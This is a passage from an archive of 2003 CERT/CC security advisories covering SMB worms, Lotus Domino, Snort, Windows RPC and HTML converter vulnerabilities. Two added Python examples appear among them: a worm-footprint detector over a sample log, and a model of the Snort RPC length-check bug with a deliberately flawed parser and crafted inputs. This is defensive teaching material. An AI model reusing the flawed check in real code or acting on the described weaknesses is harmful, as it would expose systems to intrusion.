   psexec.exe        A copy of the Remote Process Launch application (from sysinternals.com, used for replicating the worm)
   main.exe          The bot application

W32/Slackor also contains an IRC bot. When this bot joins its IRC network, a remote intruder controlling the IRC channel can issue arbitrary commands on the compromised computer, including launching denial-of-service attacks.

Network footprint

Widespread scanning for 445/tcp indicates activity of this type. Compromised hosts may also have unauthorized connections to IRC servers (typically on 6667/tcp, although ports may vary). Additionally, the VNC package installed by W32/Deloder will typically listen on 5800/tcp or 5900/tcp. If a compromised system is used in a DDoS attack on another site, large volumes of IP traffic (ICMP, UDP, or TCP) may be detected emanating from the compromised system.

II. Impact

The presence of any of these tools on a system indicates that the Administrator password has likely been compromised, and the entire system is therefore suspect. With this level of access, intruders may

* exercise remote control
* expose confidential data
* install other malicious software
* change files
* delete files
* launch attacks against other sites

The scanning activities of these tools may generate high volumes of 445/tcp traffic. As a result, some Internet-connected hosts or networks with compromised hosts may experience performance issues (including denial-of-service conditions).
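The network footprint described above, turned into a check over connection records, as an added example that is not part of the advisory (the log format, the addresses and the scan threshold are constructed assumptions):

```python
"""Flag hosts whose connection records match the footprint CA-2003-08 describes:
bursts of 445/tcp connection attempts (often staying inside the scanning host's
own /16), outbound IRC control connections, and inbound connections to the VNC
ports W32/Deloder installs.

Added example, not part of the advisory. The flow-log format is constructed
(one line per TCP connection attempt: "src_ip dst_ip dst_port"), and the scan
threshold is an assumption chosen for the sample data.
"""
from collections import defaultdict
import ipaddress

SMB_PORT = 445              # direct-hosted SMB, the port these tools scan
IRC_PORTS = {6667}          # typical IRC control channel; the advisory notes ports vary
VNC_PORTS = {5800, 5900}    # listeners W32/Deloder installs on a compromised host
SCAN_THRESHOLD = 8          # assumed: distinct 445/tcp targets before we call it scanning

# Constructed sample log: 10.20.1.15 behaves like an infected host; 10.20.1.99
# is an ordinary client talking to a single file server.
SAMPLE_LOG = """\
10.20.1.15 10.20.3.1 445
10.20.1.15 10.20.3.2 445
10.20.1.15 10.20.3.3 445
10.20.1.15 10.20.3.4 445
10.20.1.15 10.20.3.5 445
10.20.1.15 10.20.3.6 445
10.20.1.15 10.20.3.7 445
10.20.1.15 10.20.3.8 445
10.20.1.15 10.21.0.4 445
10.20.1.15 198.51.100.7 6667
203.0.113.9 10.20.1.15 5800
10.20.1.99 10.20.3.1 445
10.20.1.99 10.20.3.1 445
"""


def parse_line(line):
    """Split one constructed log line into (src, dst, port)."""
    src, dst, port = line.split()
    return src, dst, int(port)


def same_slash16(a, b):
    """True when both addresses share their first two high-order octets."""
    return int(ipaddress.IPv4Address(a)) >> 16 == int(ipaddress.IPv4Address(b)) >> 16


def analyze(log_text):
    """Map each suspicious host to the footprint indicators it matched."""
    smb_targets = defaultdict(set)   # src -> distinct hosts probed on 445/tcp
    local_probes = defaultdict(int)  # src -> 445/tcp probes that stayed inside its /16
    irc_peers = defaultdict(set)     # src -> IRC servers it connected to
    vnc_clients = defaultdict(set)   # dst -> remote hosts reaching its VNC port

    for line in log_text.splitlines():
        if not line.strip():
            continue
        src, dst, port = parse_line(line)
        if port == SMB_PORT:
            smb_targets[src].add(dst)
            if same_slash16(src, dst):
                local_probes[src] += 1
        elif port in IRC_PORTS:
            irc_peers[src].add(dst)
        elif port in VNC_PORTS:
            vnc_clients[dst].add(src)

    findings = defaultdict(list)
    for src, targets in smb_targets.items():
        if len(targets) >= SCAN_THRESHOLD:
            findings[src].append(("scan_445", len(targets), local_probes[src]))
    for src, servers in irc_peers.items():
        findings[src].append(("irc_control", sorted(servers)))
    for dst, clients in vnc_clients.items():
        findings[dst].append(("vnc_listener", sorted(clients)))
    return dict(findings)


if __name__ == "__main__":
    for host, hits in sorted(analyze(SAMPLE_LOG).items()):
        print(host)
        for hit in hits:
            print("   ", hit)
```

A single host that matches all three indicators, as 10.20.1.15 does in the sample, is the pattern the advisory describes; the one-off 445/tcp client is left alone.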
Sites targeted by the DDoS agents installed by this activity may experience unusually heavy traffic volumes or high packet rates, resulting in degradation of services or loss of connectivity altogether.

III. Solution

In addition to following the steps outlined in this section, the CERT/CC encourages home users to review the "Home Network Security" and "Home Computer Security" documents.

Disable or secure file shares

Best practice dictates a policy of least privilege; if a given computer is not intended to be a server (i.e., share files with others), "File and Printer Sharing for Microsoft Networks" should be disabled. For computers that export shares, ensure that user authentication is required and that each account has a well-chosen password. Furthermore, consider using a firewall to control which computer can access these shares.

By default, Windows NT, 2000, and XP create certain hidden and administrative shares. See the HOW TO: Create and Delete Hidden or Administrative Shares on Client Computers for further guidelines on managing these shares.

Use strong passwords

The various tools described above exploit the use of weak or Null passwords in order to propagate, so using strong passwords can help keep them from infecting your systems. Microsoft has posted a "Create Strong Passwords" checklist.

Run and maintain an anti-virus product

The malicious code being distributed in these attacks is under continuous development by intruders, but most anti-virus software vendors release frequently updated information, tools, or virus databases to help detect and recover from the malicious code involved in this activity. Therefore, it is important that users keep their anti-virus software up to date. The CERT/CC maintains a partial list of anti-virus vendors.

Many anti-virus packages support automatic updates of virus definitions. The CERT/CC recommends using these automatic updates when available.
Do not run programs of unknown origin

Never download, install, or run a program unless you know it to be authored by a person or company that you trust. Users of IRC, Instant Messaging (IM), and file-sharing services should be particularly wary of following links or running software sent to them by other users, as this is a commonly used method among intruders attempting to build networks of DDoS agents.

Deploy a firewall

The CERT/CC also recommends using a firewall product, such as a network appliance or a personal firewall software package. In some situations, these products may be able to alert users to the fact that their machine has been compromised. Furthermore, they have the ability to block intruders from accessing backdoors over the network. However, no firewall can detect or stop all attacks, so it is important to continue to follow safe computing practices.

Ingress/egress filtering

Ingress filtering manages the flow of traffic as it enters a network under your administrative control. In the network usage policy of many sites, external hosts are only permitted to initiate inbound traffic to machines that provide public services on specific ports. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound traffic to non-authorized services.

Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for internal systems to access SMB shares across the Internet.

In the case of the intruder activity described above, blocking connections to port 445/tcp from entering or leaving your network reduces the risk of external infected systems attacking hosts inside your network or vice-versa.

Recovering from a system compromise

If you believe a system under your administrative control has been compromised, please follow the steps outlined in Steps for Recovering from a UNIX or NT System Compromise.

IV. References

1. Trends in Denial of Service Attack Technology: http://www.cert.org/archive/pdf/DoS_trends.pdf
2. Managing the Threat of Denial-of-Service Attacks: http://www.cert.org/archive/pdf/Managing_DoS.pdf
3. IN-2002-06: W32/Lioten Malicious Code: http://www.cert.org/incident_notes/IN-2002-06.html
4. CA-2001-20: Continuing Threats to Home Users: http://www.cert.org/advisories/CA-2001-20.html
5. IN-2000-02: Exploitation of Unprotected Windows Networking Shares: http://www.cert.org/incident_notes/IN-2000-02.html
6. IN-2000-03: 911 Worm: http://www.cert.org/incident_notes/IN-2000-03.html
7. IN-2002-03: Social Engineering Attacks via IRC and Instant Messaging: http://www.cert.org/incident_notes/IN-2002-03.html
8. VNC (Virtual Network Computing): http://www.uk.research.att.com/vnc/
9. Home Network Security: http://www.cert.org/tech_tips/home_networks.html
10. Home Computer Security: http://www.cert.org/homeusers/HomeComputerSecurity/
11. HOW TO: Create and Delete Hidden or Administrative Shares on Client Computers: http://support.microsoft.com/default.aspx?scid=kb;en-us;Q314984&sd=tech
12. Checklist: Create Strong Passwords: http://www.microsoft.com/security/articles/password.asp
13. Anti-virus vendors: http://www.cert.org/other_sources/viruses.html#VI
14. Steps for Recovering from a UNIX or NT System Compromise: http://www.cert.org/tech_tips/win-UNIX-system_compromise.html

Reporting

The CERT/CC is interested in receiving reports of this activity. If machines under your administrative control are compromised, please send mail to cert@cert.org with the following text included in the subject line: "[CERT#36888]".
_________________________________________________________________

Feedback can be directed to the authors: Allen Householder and Roman Danyliw
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2003-08.html
Revision History

   March 11, 2003: Initial release

From - Wed Mar 26 12:27:33 2003
Date: Wed, 26 Mar 2003 11:42:45 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino

CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino

Original release date: March 26, 2003
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Lotus Notes and Domino versions prior to 5.0.12 and 6.0 Gold
* VU#571297 affects 5.0.12, 6.0.1 and prior versions.

Overview

Multiple vulnerabilities have been reported to affect Lotus Notes clients and Domino servers. Multiple reporters, the close timing, and some ambiguity caused confusion about what releases are vulnerable. We are issuing this advisory to help clarify the details of the vulnerabilities, the versions affected, and the patches that resolve these issues.

I. Description

In February 2003, NGS Software released several advisories detailing vulnerabilities affecting Lotus Notes and Domino.
The following vulnerabilities reported by NGS Software affect versions of Lotus Domino prior to 5.0.12 and 6.0:

VU#206361 - Lotus iNotes vulnerable to buffer overflow via PresetFields FolderName field
   Lotus Technical Documentation: KSPR5HUQ59
   NGS Software's Advisory: NISR17022003b

VU#355169 - Lotus Domino Web Server vulnerable to denial of service via incomplete POST request
   Lotus Technical Documentation: KSPR5HTQHS
   NGS Software's Advisory: NISR17022003d

VU#542873 - Lotus iNotes vulnerable to buffer overflow via PresetFields s_ViewName field
   Lotus Technical Documentation: KSPR5HUPEK
   NGS Software's Advisory: NISR17022003b

VU#772817 - Lotus Domino Web Server vulnerable to buffer overflow via non-existent "h_SetReturnURL" parameter with an overly long "Host Header" field
   Lotus Technical Documentation: KSPR5HTLW6
   NGS Software's Advisory: NISR17022003a

The following vulnerability reported by NGS Software affects versions of Lotus Domino up to and including 5.0.12 and 6.0.1:

VU#571297 - Lotus Notes and Domino COM Object Control Handler contains buffer overflow
   Lotus Technical Documentation: SWG21104543
   NGS Software's Advisory: NISR17022003e

VU#571297 was originally reported as a vulnerability in an iNotes ActiveX control. The vulnerable code is not specific to iNotes or ActiveX. The iNotes ActiveX control was an attack vector for the vulnerability and is not the affected code base. Because this issue is not specific to ActiveX, Lotus Notes clients and Domino Servers running on platforms other than Microsoft Windows may be affected.

In March 2003, Rapid7, Inc. released several advisories.
The following vulnerabilities, reported by Rapid7, Inc., affect versions of Lotus Domino prior to 5.0.12:

VU#433489 - Lotus Domino Server susceptible to a pre-authentication buffer overflow during Notes authentication
   Lotus Technical Documentation: DBAR5CJJJS
   Rapid7, Inc.'s Advisory: R7-0010

VU#411489 - Lotus Domino Web Retriever contains a buffer overflow vulnerability
   Lotus Technical Documentation: KSPR5DFJTR
   Rapid7, Inc.'s Advisory: R7-0011

Rapid7, Inc. also discovered that Lotus Domino pre-release and beta versions of 6.0 were affected by the following vulnerability:

VU#583184 - Lotus Domino R5 Server Family contains multiple vulnerabilities in LDAP handling code
   Lotus Technical Documentation: DWUU4W6NC8
   Rapid7, Inc.'s Advisory: R7-0012

VU#583184 was a regression of the PROTOS LDAP Test-Suite from CA-2001-18 and was originally fixed in 5.0.7a.

II. Impact

The impact of these vulnerabilities ranges from denial of service to data corruption and the potential to execute arbitrary code. For details about the impact of a specific vulnerability, please see the related vulnerability note.

III. Solution

Upgrade

Most of these vulnerabilities are resolved in versions 5.0.12 and 6.0.1 of Lotus Domino. Only VU#571297, "Lotus Notes and Domino COM Object Control Handler contains buffer overflow," is not resolved in 5.0.12 or 6.0.1. Critical Fix 1 for 6.0.1 was released on March 18, 2003, to resolve this issue for both the Notes client and Domino server.

Apply a patch

Patches are available for some vulnerabilities. Please view the individual vulnerability notes for specific patch information.

Block access from outside the network perimeter

Lotus Domino servers listen on port 1352/TCP. Notes may also be configured to listen on other ports, such as NETBIOS, SPX, or XPC. Blocking access to these ports from machines outside your trusted network perimeter may help mitigate successful exploitation of these vulnerabilities.

Appendix A - References

1. http://www.kb.cert.org/vuls/id/571297
2. http://www.kb.cert.org/vuls/id/206361
3. http://www.ibm.com/Search?v=11

Date: Thu, 17 Apr 2003 11:31:01 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2003-13 Multiple Vulnerabilities in Snort Preprocessors

CERT Advisory CA-2003-13 Multiple Vulnerabilities in Snort Preprocessors

Original release date: April 17, 2003
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Snort IDS, versions 1.8 through 2.0 RC1

Overview

There are two vulnerabilities in the Snort Intrusion Detection System, each in a separate preprocessor module. Both vulnerabilities allow remote attackers to execute arbitrary code with the privileges of the user running Snort, typically root.

I. Description

The Snort intrusion detection system ships with a variety of preprocessor modules that allow the user to selectively include additional functionality. Researchers from two independent organizations have discovered vulnerabilities in two of these modules, the RPC preprocessor and the "stream4" TCP fragment reassembly preprocessor. For additional information regarding Snort, please see http://www.snort.org/.

VU#139129 - Heap overflow in Snort "stream4" preprocessor (CAN-2003-0029)

Researchers at CORE Security Technologies have discovered a remotely exploitable heap overflow in the Snort "stream4" preprocessor module. This module allows Snort to reassemble TCP packet fragments for further analysis. To exploit this vulnerability, an attacker must disrupt the state tracking mechanism of the preprocessor module by sending a series of packets with crafted sequence numbers. This causes the module to bypass a check for buffer overflow attempts and allows the attacker to insert arbitrary code into the heap.
For additional information, please read the Core Security Technologies Advisory located at

   http://www.coresecurity.com/common/showdoc.php?idx=313&idxseccion=10

This vulnerability affects Snort versions 1.8.x, 1.9.x, and 2.0 prior to RC1. Snort has published an advisory regarding this vulnerability; it is available at http://www.snort.org/advisories/snort-2003-04-16-1.txt.

VU#916785 - Buffer overflow in Snort RPC preprocessor (CAN-2003-0033)

Researchers at Internet Security Systems (ISS) have discovered a remotely exploitable buffer overflow in the Snort RPC preprocessor module. Martin Roesch, primary developer for Snort, described the vulnerability as follows:

   When the RPC decoder normalizes fragmented RPC records, it incorrectly checks the lengths of what is being normalized against the current packet size, leading to an overflow condition.

The RPC preprocessor is enabled by default. For additional information, please read the ISS X-Force advisory located at

   http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21951

This vulnerability affects Snort versions 1.8.x through 1.9.1 and version 2.0 Beta.

II. Impact

Both VU#139129 and VU#916785 allow remote attackers to execute arbitrary code with the privileges of the user running Snort, typically root. In addition, it is not necessary for the attacker to know the IP address of the Snort device they wish to attack; merely sending malicious traffic where it can be observed by an affected Snort sensor is sufficient to exploit these vulnerabilities.

III. Solution

Upgrade to Snort 2.0

Both VU#139129 and VU#916785 are addressed in Snort version 2.0, which is available at

   http://www.snort.org/dl/snort-2.0.0.tar.gz

Binary-only versions of Snort are available from

   http://www.snort.org/dl/binaries

For information from other vendors that ship affected versions of Snort, please see Appendix A of this document.
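The RPC decoder mistake quoted above, modeled as an added example that is not Snort's code: only the RPC record-marking layout is the real format; the two normalizers and OUT_CAPACITY are illustrative assumptions written for this page.

```python
"""Model of the length-check mistake CA-2003-13 attributes to the Snort RPC
preprocessor: fragments of an ONC RPC record (RFC 1831 record marking: a
4-byte mark whose high bit flags the last fragment and whose low 31 bits give
the fragment length) are normalized into one contiguous buffer, and each
declared fragment length is validated against the wrong bound.

Added example, not Snort's code: the record-marking layout is the real one,
but both normalizers are simplified illustrations written for this page, and
OUT_CAPACITY is an assumed stand-in for the preprocessor's working buffer.
"""
import struct
from typing import Optional

LAST_FRAGMENT = 0x80000000   # high bit of the record mark
LENGTH_MASK = 0x7FFFFFFF     # low 31 bits: fragment length in bytes
OUT_CAPACITY = 64            # assumed size of the normalization buffer


def normalize_flawed(packet: bytes) -> Optional[bytearray]:
    """Flawed: each fragment length is compared only with the whole packet size,
    never with the bytes remaining after its mark, and the accumulated output
    is never compared with OUT_CAPACITY. In C the copy below would run past the
    packet and past the buffer; here the over-long result shows the same gap."""
    out = bytearray()
    pos = 0
    while pos + 4 <= len(packet):
        (mark,) = struct.unpack_from("!I", packet, pos)
        frag_len = mark & LENGTH_MASK
        if frag_len > len(packet):            # wrong bound: total size, not what is left
            return None
        pos += 4
        out += packet[pos:pos + frag_len]     # copy trusts the declared length
        pos += frag_len
        if mark & LAST_FRAGMENT:
            break
    return out


def normalize_checked(packet: bytes) -> Optional[bytearray]:
    """Hardened: a fragment must fit in the bytes that remain in the packet, and
    the accumulated output must fit in the buffer; otherwise the record is
    rejected rather than partially copied."""
    out = bytearray()
    pos = 0
    while pos + 4 <= len(packet):
        (mark,) = struct.unpack_from("!I", packet, pos)
        frag_len = mark & LENGTH_MASK
        pos += 4
        if frag_len > len(packet) - pos:          # declared length exceeds remaining bytes
            return None
        if len(out) + frag_len > OUT_CAPACITY:    # fragments together exceed the buffer
            return None
        out += packet[pos:pos + frag_len]
        pos += frag_len
        if mark & LAST_FRAGMENT:
            return out
    return None   # packet ended before a last-fragment mark was seen


def record(*fragments: bytes) -> bytes:
    """Build a well-formed multi-fragment RPC record (last fragment flagged)."""
    pkt = b""
    for i, frag in enumerate(fragments):
        mark = len(frag) | (LAST_FRAGMENT if i == len(fragments) - 1 else 0)
        pkt += struct.pack("!I", mark) + frag
    return pkt


# Constructed inputs.
BENIGN = record(b"A" * 20, b"B" * 20)
# Second mark declares 40 bytes but only 10 follow: 40 < 58 total, so the flawed
# check passes although the fragment overruns the packet.
TRUNCATED = (struct.pack("!I", 40) + b"A" * 40
             + struct.pack("!I", 40 | LAST_FRAGMENT) + b"B" * 10)
# Every fragment is smaller than the packet, but together they exceed OUT_CAPACITY.
OVERSIZED = record(b"C" * 30, b"C" * 30, b"C" * 30)


if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("truncated", TRUNCATED), ("oversized", OVERSIZED)):
        flawed = normalize_flawed(pkt)
        checked = normalize_checked(pkt)
        print(f"{name:9s} flawed={None if flawed is None else len(flawed)} "
              f"checked={None if checked is None else len(checked)}")
```

The hardened normalizer accepts the benign record and rejects both crafted ones; the flawed one accepts all three, and on the oversized record produces 90 bytes for a 64-byte buffer.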
Disable affected preprocessor modules

Sites that are unable to immediately upgrade affected Snort sensors may prevent exploitation of this vulnerability by commenting out the affected preprocessor modules in the "snort.conf" configuration file.

To prevent exploitation of VU#139129, comment out the following line:

   preprocessor stream4_reassemble

To prevent exploitation of VU#916785, comment out the following line:

   preprocessor rpc_decode: 111 32771

After commenting out the affected modules, send a SIGHUP signal to the affected Snort process to update the configuration.

Note that disabling these modules may have adverse effects on a sensor's ability to correctly process RPC record fragments and TCP packet fragments. In particular, disabling the "stream4" preprocessor module will prevent the Snort sensor from detecting a variety of IDS evasion attacks.

Block outbound packets from Snort IDS systems

You may be able to limit an attacker's capabilities if the system is compromised by blocking all outbound traffic from the Snort sensor. While this workaround will not prevent exploitation of the vulnerability, it may make it more difficult for the attacker to create a useful exploit.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Apple Computer, Inc.

   Snort is not shipped with Mac OS X or Mac OS X Server.

Ingrian Networks

   Ingrian Networks products are not susceptible to VU#139129 and VU#916785 since they do not use Snort. Ingrian customers who are using the IDS Extender Service Engine to mirror cleartext data to a Snort-based IDS should upgrade their IDS software.

NetBSD

   NetBSD does not include snort in the base system. Snort is available from the 3rd party software system, pkgsrc.
   Users who have installed net/snort, net/snort-mysql or net/snort-pgsql should update to a fixed version. pkgsrc/security/audit-packages can be used to keep up to date with these types of issues.

Red Hat Inc.

   Not vulnerable. Red Hat does not ship Snort in any of our supported products.

SGI

   SGI does not ship snort as part of IRIX.

Snort

   Snort 2.0 has undergone an external third party professional security audit funded by Sourcefire.
_________________________________________________________________

The CERT/CC acknowledges Bruce Leidl, Juan Pablo Martinez Kuhn, and Alejandro David Weil of Core Security Technologies for their discovery of VU#139129. We also acknowledge Mark Dowd and Neel Mehta of ISS X-Force for their discovery of VU#916785.
_________________________________________________________________

Authors: Jeffrey P. Lanza and Cory F. Cohen.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2003-13.html
Revision History

   April 17, 2003: Initial release

From - Tue Jun 3 13:31:13 2003
Date: Tue, 3 Jun 2003 15:57:29 -0400
From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2003-02 Precedence: list Status: RO X-Status: X-Keywords: X-UID: 82 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2003-02 June 3, 2003 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in March 2003 (CS-2003-01), we have seen an integer overflow vulnerability within Sun's XDR Library, multiple vulnerabilities in Lotus Notes and Domino Server, a buffer overflow vulnerability in Sendmail, and multiple vulnerabilities within Snort's preprocessors. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. Integer overflow in Sun RPC XDR library routines An integer overflow vulnerability exists in the xdrmem_getbytes() function distributed as part of the Sun Microsystems XDR library. This overflow may allow a remote attacker to execute arbitrary code on the victim machine. 
    CERT Advisory CA-2003-10: Integer overflow in Sun RPC XDR library routines
    http://www.cert.org/advisories/CA-2003-10.html

    Vulnerability Note VU#516825: Integer overflow in Sun RPC XDR library routines
    http://www.kb.cert.org/vuls/id/516825

2. Multiple Vulnerabilities in Lotus Notes and Domino

Multiple vulnerabilities have been reported to affect Lotus Notes clients and Domino servers. Because of the confusion surrounding these vulnerabilities, we released an advisory to clarify the details of the vulnerabilities, the versions affected, and the patches that resolve these issues.

    CERT Advisory CA-2003-11: Multiple Vulnerabilities in Lotus Notes and Domino
    http://www.cert.org/advisories/CA-2003-11.html

    Vulnerability Note VU#206361: Lotus iNotes vulnerable to buffer overflow via PresetFields FolderName field
    http://www.kb.cert.org/vuls/id/206361

    Vulnerability Note VU#355169: Lotus Domino Web Server vulnerable to denial of service via incomplete POST request
    http://www.kb.cert.org/vuls/id/355169

    Vulnerability Note VU#542873: Lotus iNotes vulnerable to buffer overflow via PresetFields s_ViewName field
    http://www.kb.cert.org/vuls/id/542873

    Vulnerability Note VU#772817: Lotus Domino Web Server vulnerable to buffer overflow via non-existent "h_SetReturnURL" parameter with an overly long "Host Header" field
    http://www.kb.cert.org/vuls/id/772817

    Vulnerability Note VU#571297: Lotus Notes and Domino COM Object Control Handler contains buffer overflow
    http://www.kb.cert.org/vuls/id/571297

    Vulnerability Note VU#433489: Lotus Domino Server susceptible to a pre-authentication buffer overflow during Notes
    http://www.kb.cert.org/vuls/id/433489

    Vulnerability Note VU#411489: Lotus Domino Web Retriever contains a buffer overflow vulnerability
    http://www.kb.cert.org/vuls/id/411489

    Vulnerability Note VU#583184: Lotus Domino R5 Server Family contains multiple vulnerabilities in LDAP handling code
    http://www.kb.cert.org/vuls/id/583184

3. Buffer Overflow in Sendmail

There is a remotely exploitable vulnerability in sendmail that could allow an attacker to gain control of a vulnerable sendmail server. Due to a variable type conversion problem, sendmail may not adequately check the length of email address tokens. A specially crafted email message could trigger a stack overflow.

    CERT Advisory CA-2003-12: Buffer Overflow in Sendmail
    http://www.cert.org/advisories/CA-2003-12.html

    Vulnerability Note VU#897604: Sendmail address parsing buffer overflow
    http://www.kb.cert.org/vuls/id/897604

4. Multiple Vulnerabilities in Snort Preprocessors

There are two vulnerabilities in the Snort Intrusion Detection System, each in a separate preprocessor module. Both vulnerabilities allow remote attackers to execute arbitrary code with the privileges of the user running Snort, typically root.

    CERT Advisory CA-2003-13: Multiple Vulnerabilities in Snort Preprocessors
    http://www.cert.org/advisories/CA-2003-13.html

    Vulnerability Note VU#139129: Heap overflow in Snort "stream4" preprocessor
    http://www.kb.cert.org/vuls/id/139129

    Vulnerability Note VU#916785: Buffer overflow in Snort RPC preprocessor
    http://www.kb.cert.org/vuls/id/916785
______________________________________________________________________

What's New and Updated

Since the last CERT Summary, we have published new and updated

* Advisories
  http://www.cert.org/advisories/
* Vulnerability Notes
  http://www.kb.cert.org/vuls
* CERT/CC Statistics
  http://www.cert.org/stats/cert_stats.html
* Training Schedule
  http://www.cert.org/training/
______________________________________________________________________

This document is available from: http://www.cert.org/summaries/CS-2003-02.html
______________________________________________________________________

Date: Mon, 14 Jul 2003 16:26:13 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Subject: CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML

CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML Conversion Library

Original issue date: July 14, 2003
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

* Windows 98 and 98 Second Edition (SE)
* Windows NT 4.0 and 4.0 Terminal Server Edition (TSE)
* Windows Millennium Edition (Me)
* Windows 2000
* Windows XP
* Windows Server 2003

Overview

A buffer overflow vulnerability exists in a shared HTML conversion library included in Microsoft Windows. An attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service.

I. Description

Microsoft Windows includes a shared HTML conversion library (html32.cnv). According to Microsoft Security Bulletin MS03-023, "The HTML converter is an extension which allows applications to convert HTML data into Rich Text Format (RTF) while maintaining the formatting and structure of the data as well as the text. The converter also supports the conversion of RTF data into HTML."

The HTML conversion library contains a buffer overflow vulnerability that can be triggered by a specially crafted align attribute in an element. The library can be loaded by any application on the system. For example, Internet Explorer (IE) uses the library to handle HTML data stored in the clipboard. Using script, an attacker can cause IE to copy a crafted element into the clipboard and load the library. The attacker could accomplish this by convincing a victim to view an HTML web page or HTML email message with IE, Outlook, or Outlook Express in a zone where Active scripting and Allow paste operations via script are enabled.

This vulnerability is not limited to IE, Outlook, or Outlook Express. Any program, including non-Microsoft applications, can use the vulnerable library and may present other vectors of attack.

Further information is available in VU#823260. Common Vulnerabilities and Exposures (CVE) refers to this issue as CAN-2003-0469.

II. Impact

An attacker could execute arbitrary code with the privileges of the process that loaded the HTML conversion library. The attacker could also crash the process, causing a denial of service.

III. Solution

Apply a patch

Apply the appropriate patch as specified by Microsoft Security Bulletin MS03-023.

Modify Internet Explorer security zone configuration

Modify one or both of the following IE security zone settings in the Internet zone and the zone(s) used by Outlook, Outlook Express, and any other application that uses Internet Explorer or the WebBrowser ActiveX control to render HTML:

* Set Allow paste operations via script to Disable
* Set Active scripting to Disable

Either of these changes will prevent attacks that depend on scripting in the IE HTML rendering engine. However, these changes are not complete solutions, and they do not prevent attacks that use other vectors. Note that disabling Active scripting provides defense against other attacks that are outside the scope of this document.

Instructions for modifying IE 5 security zone settings can be found in the CERT/CC Malicious Web Scripts FAQ. In IE 6, the High security zone setting includes both of these changes.

Appendix A. Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history.
If a vendor is not listed below, we have not received their comments.

Microsoft

Please see Microsoft Security Bulletin MS03-023.

Appendix B. References

* CERT/CC Vulnerability Note VU#823260
* Microsoft Security Bulletin MS03-023
_________________________________________________________________

This vulnerability was publicly reported by Digital Scream.
_________________________________________________________________

Feedback can be directed to the author, Art Manion.
______________________________________________________________________

This document is available from:
______________________________________________________________________

Revision History

July 14, 2003: Initial release


From: CERT Advisory
To: cert-advisory@cert.org
Date: Thu, 17 Jul 2003 01:16:50 -0400
Subject: CERT Advisory CA-2003-16 Buffer Overflow in Microsoft RPC

CERT Advisory CA-2003-16 Buffer Overflow in Microsoft RPC

Original release date: July 17, 2003
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

* Microsoft Windows NT 4.0
* Microsoft Windows NT 4.0 Terminal Services Edition
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server 2003

Overview

A buffer overflow vulnerability exists in Microsoft's Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service.

I. Description

There is a buffer overflow in Microsoft's RPC implementation. According to Microsoft Security Bulletin MS03-026, "There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages. This particular vulnerability affects a Distributed Component Object Model (DCOM) interface with RPC, which listens on TCP/IP port 135. This interface handles DCOM object activation requests that are sent by client machines (such as Universal Naming Convention (UNC) paths) to the server."

The CERT/CC is tracking this issue as VU#568148. This reference number corresponds to CVE candidate CAN-2003-0352.

II. Impact

A remote attacker could exploit this vulnerability to execute arbitrary code with Local System privileges or to cause a denial of service.

III. Solution

Apply a patch

Apply the appropriate patch as specified by Microsoft Security Bulletin MS03-026.

Restrict access

You may wish to block access from outside your network perimeter, specifically by blocking access to port 135/TCP. This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate.
_________________________________________________________________

This vulnerability was discovered by The Last Stage of Delirium Research Group. Microsoft has published Microsoft Security Bulletin MS03-026, upon which this document is largely based.
_________________________________________________________________

Author: Ian A. Finlay
______________________________________________________________________

This document is available from: http://www.cert.org/advisories/CA-2003-16.html
______________________________________________________________________

Revision History

July 17, 2003: Initial release


From: CERT Advisory
To: cert-advisory@cert.org
Date: Fri, 25 Jul 2003 15:03:35 -0400
Subject: CERT Advisory CA-2003-18 Integer Overflows in Microsoft Windows DirectX MIDI Library

CERT Advisory CA-2003-18 Integer Overflows in Microsoft Windows DirectX MIDI Library

Original issue date: July 25, 2003
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

* Microsoft Windows systems running DirectX (Windows 98, 98SE, NT 4.0, NT 4.0 TSE, 2000, Server 2003)

Overview

